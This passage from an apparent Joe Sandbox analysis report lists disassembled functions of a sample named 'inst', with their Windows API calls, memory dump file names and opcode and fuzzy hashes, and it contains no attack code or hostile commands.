Part of subcall function 00AEF9AF: LeaveCriticalSection.KERNEL32(00B5CD40,00A7B364,?,00A7DA81,00000000,?,?,?,?,00A7B6E0,?,00000000,?,?), ref: 00AEF9D8

FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00A7B6E0,?,00000000,?,?), ref: 00A7DAA6

Part of subcall function 00A7DC40: LoadResource.KERNEL32(00A7B364,00B2CD88,00000000,?,00A7DAB8,00000000,00000000,?,?,00000000,00000000,?,?,?,?,00A7B6E0), ref: 00A7DC4C

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CriticalResourceSection$EnterFindLeaveLoad
String ID:
API String ID: 1986744039-0
Opcode ID: a53ee378557267651c04f189ec6898f0d25bccf40bc06f8ccb4c35798fa18183
Instruction ID: 2ca75451f0a658c978679da244816537bd2fa8725718cfdafd3ed5d768cd7dd8
Opcode Fuzzy Hash: a53ee378557267651c04f189ec6898f0d25bccf40bc06f8ccb4c35798fa18183
Instruction Fuzzy Hash: CAF02863B492293BA3319A666C40B77ABBEEEC07F6701813AFC49D3340DA119C0142F1

Function 00ABEBDA Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ABEBE1

Part of subcall function 00ABDE99: __EH_prolog3.LIBCMT ref: 00ABDEA0

Part of subcall function 00ABEB31: __EH_prolog3.LIBCMT ref: 00ABEB38

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 59595c01f9d609d12b5e3b3d5cf9b4a06ac1ff1b330e369c33ecb7ec35bd21d9
Instruction ID: c22c9df04d97bf6b08c2aa8916e0a1e421f74f3d6032a3b617711db6a25d9ccc
Opcode Fuzzy Hash: 59595c01f9d609d12b5e3b3d5cf9b4a06ac1ff1b330e369c33ecb7ec35bd21d9
Instruction Fuzzy Hash: 6711E636801109AFDF06EFE4DE42AEEBB7AEF14310F104514F611A61A2DB359A25DB50

Function 00A94BB9 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A94BC2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 019d27aa0c988e54cfc8a11014f9e016a4f71bc2ca12919284b5c94c237e4b73
Instruction ID: a994149d6951a2749d977937d172072eaecbb79e5befd2ffb2d470584597022d
Opcode Fuzzy Hash: 019d27aa0c988e54cfc8a11014f9e016a4f71bc2ca12919284b5c94c237e4b73
Instruction Fuzzy Hash: 7811E171604705EFDB30AB28C845FD773F8AB08356F004829E19A87092E7B4E989CBD0

Function 00AC62CA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AC62D1

Part of subcall function 00A96986: _wcschr.LIBCMT ref: 00A969AB

Part of subcall function 00AC5F4D: __EH_prolog3_GS.LIBCMT ref: 00AC5F54

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3H_prolog3__wcschr
String ID:
API String ID: 4028972141-0
Opcode ID: 938d11921d527da63fae33a279d7efbc78d2b5d7dc679f50ad9be86ced535a5a
Instruction ID: 6246f4685a8e843ba83155152c0824f7f5a066f67a88d985ab8bb9d63da53884
Opcode Fuzzy Hash: 938d11921d527da63fae33a279d7efbc78d2b5d7dc679f50ad9be86ced535a5a
Instruction Fuzzy Hash: A5019235384758E6D704EA60CE12FBD3274BF15712F12C11ABA069E2C1CFB08A41D7A2

Function 00AFF4B2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00AFF4F9

Part of subcall function 00AF98D1: __getptd_noexit.LIBCMT ref: 00AF98D1

Part of subcall function 00AFA5B1: __decode_pointer.LIBCMT ref: 00AFA5BC

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: __decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 3158947991-0
Opcode ID: ba83ad8c6064a2c91b521744f896e3fe890138e88bf8eb251f58be113f18f249
Instruction ID: a321871118a137e55f88a69fe6fe58fb0371c4402d57a9a3774a9ddc62cd2520
Opcode Fuzzy Hash: ba83ad8c6064a2c91b521744f896e3fe890138e88bf8eb251f58be113f18f249
Instruction Fuzzy Hash: 39F0AF7180021DEFCF21BFE48D024AF7AB0BF04712F118565FA189A192D735CA61EB91

Function 6C60C24A Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C60C25C

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 585001bb78b6470ffa2670af58674b2ad1a01bbb4a34216b68d4841a47ed655b
Instruction ID: 71489659f134dfd9c5062e87bc13e65618de53b490f24dd9ff60fa5f6b19e478
Opcode Fuzzy Hash: 585001bb78b6470ffa2670af58674b2ad1a01bbb4a34216b68d4841a47ed655b
Instruction Fuzzy Hash: E3F05E71318A00BFC3269B5AC900D97B7F8EBCB764B10892DE06AE6D10C230A441CF7A

Function 00AB2343 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00AB236A

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ClientRect
String ID:
API String ID: 846599473-0
Opcode ID: b7dd7c5c04fdd184bf0ba3297ec794f99a60942a445af202957037d4d04e8cf4
Instruction ID: 454da576dd43a9520d6c7e4dace8736c9662379405432c110da9075e10d67159
Opcode Fuzzy Hash: b7dd7c5c04fdd184bf0ba3297ec794f99a60942a445af202957037d4d04e8cf4
Instruction Fuzzy Hash: 2EF0F972800209EFCB10DFAEC9449AFFBFCFF94600F00445AA465E3211D6706A01CB51

Function 6C5E4CBD Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000FC,?), ref: 6C5E4CF0

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 697ffcde8ff92708f3af1ee7a531b15b7d7c2fad15f7d38ddfe03807d876ad40
Instruction ID: 41ff1738b6398dc2e5c938681271966ee31455248415385a9dc094827f4cd72a
Opcode Fuzzy Hash: 697ffcde8ff92708f3af1ee7a531b15b7d7c2fad15f7d38ddfe03807d876ad40
Instruction Fuzzy Hash: 24F08C73205211AFC6119F99EC84C5BBBEAEFCC620B11890AF69697651CB30D819CB61

Function 00A88940 Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00A88967

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 906285a1834f1f9b37b8f78c4cf303f02f18c65275dc4758934b38854fdad18b
Instruction ID: 08afe2585092b644ad074d200486ce6b94b68168878d83ee6ab0183126cc8820
Opcode Fuzzy Hash: 906285a1834f1f9b37b8f78c4cf303f02f18c65275dc4758934b38854fdad18b
Instruction Fuzzy Hash: D3F0A47610120AEBDF159F81D801EEE7BA9EF48354F108019FD5156260EB76EE21DBA1

Function 00AC566F Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000FC,?), ref: 00AC56A2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 432a1526114078b7457ae3c75a6686dea530edebb681aaf211703990519af287
Instruction ID: b7af934a75e70d44b9ad459ce75c739237da839e8c58a0a8e50049fe8c3837f1
Opcode Fuzzy Hash: 432a1526114078b7457ae3c75a6686dea530edebb681aaf211703990519af287
Instruction Fuzzy Hash: B3F08273105211AFC211AF959C44C4FBBA9EFC87207154919F65687152C630D805CBA1

Function 00AD03BF Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AD03C6

Part of subcall function 00A96986: _wcschr.LIBCMT ref: 00A969AB

Part of subcall function 00AD0215: __EH_prolog3_GS.LIBCMT ref: 00AD021C

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3H_prolog3__wcschr
String ID:
API String ID: 4028972141-0
Opcode ID: 155cd64f7a3b97114b7d3591465dd0f75333262288b2f001cf2bb8149b68b5ee
Instruction ID: 7be1a4966da4f08e8f94929371d2de8be9f56fbc7416028d252f724a4abf40af
Opcode Fuzzy Hash: 155cd64f7a3b97114b7d3591465dd0f75333262288b2f001cf2bb8149b68b5ee
Instruction Fuzzy Hash: E1F08232501428ABCB15FFA4CE51FFE76559F51350F148124FA0A9F282CB309F8687C1

Function 00ABF07C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00ABF083

Part of subcall function 00ABEF1E: __EH_prolog3.LIBCMT ref: 00ABEF25

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 571d8946c6413009ed6e7f2e29f53a16711fbd08c65d673dfd5e44d0b7d8c81a
Instruction ID: 30cd8660a0873c7ddd58a9c0f4cbf2251c52532deab71afe0bde07020bf3aa14
Opcode Fuzzy Hash: 571d8946c6413009ed6e7f2e29f53a16711fbd08c65d673dfd5e44d0b7d8c81a
Instruction Fuzzy Hash: 4BF02732942528AFCB11EFA08901BED37A1AF09721F084514FE545F2E7E7368A51AF81

Function 6C5D897B Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C5D8982

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: ba4d91f153587f770b308bf0c52b90235df3ea542e4995a144eef48e152b0b57
Instruction ID: 531f5b2d9fd2f77b482e5677dc4ccf6784b69266751b62f829cfc0a39f69cd42
Opcode Fuzzy Hash: ba4d91f153587f770b308bf0c52b90235df3ea542e4995a144eef48e152b0b57
Instruction Fuzzy Hash: 12F09A72D16300CBDB00DF68C8807AA77B8AF11719F16981AD085DB640DB70E9008BEE

Function 00A91631 Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A91634

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 30a9ae385c7c21e423a2160221227aaea11a4edde2c41181c97f5f72caf49659
Instruction ID: 4943596eb5a597a6241d8fa4c720bdc7efe342c9773f16887f3192c29f3f31eb
Opcode Fuzzy Hash: 30a9ae385c7c21e423a2160221227aaea11a4edde2c41181c97f5f72caf49659
Instruction Fuzzy Hash: 6BF08C36A007018FDB24DB39E808BD273E9FB84367F15486EE1A6C7085D7B4D886CA90

Function 6C5EAE3F Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C5EAE46

Part of subcall function 6C5EAD48: _memset.LIBCMT ref: 6C5EAD6C
Part of subcall function 6C5EAD48: PathCombineW.SHLWAPI(?,?,Config\SafeIME.xml), ref: 6C5EAD82

Part of subcall function 6C5EA35F: _memset.LIBCMT ref: 6C5EA39B
Part of subcall function 6C5EA35F: GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 6C5EA3B2

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: _memset$CombineFileH_prolog3ModuleNamePath
String ID:
API String ID: 2129597180-0
Opcode ID: 1fe4f71d173df448baee88012dc55777cc263a8b9261981dc727c34818518d53
Instruction ID: feef48626190d571357a3ef3202d627d310f934580c85e065e225ea2e9539441
Opcode Fuzzy Hash: 1fe4f71d173df448baee88012dc55777cc263a8b9261981dc727c34818518d53
Instruction Fuzzy Hash: AAF03A35A02205CBDF11CBB4CA047EDB7F4AF49709F5044588561A7B90DB749D48C7AA

Function 00A73E90 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000,?,00A74DC5,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A73E9B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 8ac04211ddfa903fc06d8559d2fdd25047bc2a291478d4a2d1896b7a67051377
Instruction ID: e8dc7f063d927d194c4aa83b4ef56e2172c0f0cdda8c184f6acbb7db459f5fb9
Opcode Fuzzy Hash: 8ac04211ddfa903fc06d8559d2fdd25047bc2a291478d4a2d1896b7a67051377
Instruction Fuzzy Hash: 67E04FB7B642003AE620A7A46E4AE673ADCEB80B01F648468B44DE2540FA54991093A3

Function 00AE6A97 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000002,?,00AA8D5A,00000000,00000000,?,?,00AE6931,?,0000011E,FFFFFEE2,00000002,?,00000000,00000000,00000748), ref: 00AE6AC1

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 85f78e8ecf4627a2bfbb7e9aef170a7bff66852661c5b6903d7de37b9b977364
Instruction ID: a40cd2a724f105e85ecd0d4c966ea884872b104cb32e9ab13120ac324127a576
Opcode Fuzzy Hash: 85f78e8ecf4627a2bfbb7e9aef170a7bff66852661c5b6903d7de37b9b977364
Instruction Fuzzy Hash: 3BE0C931900158FA8B11DF66CA0199E7BB8EB253D9B10CD35B816E7190E631DA10EB61

Function 00ADA29F Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,00ADFC56,?,?,?,00000000,?,?), ref: 00ADA2C2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
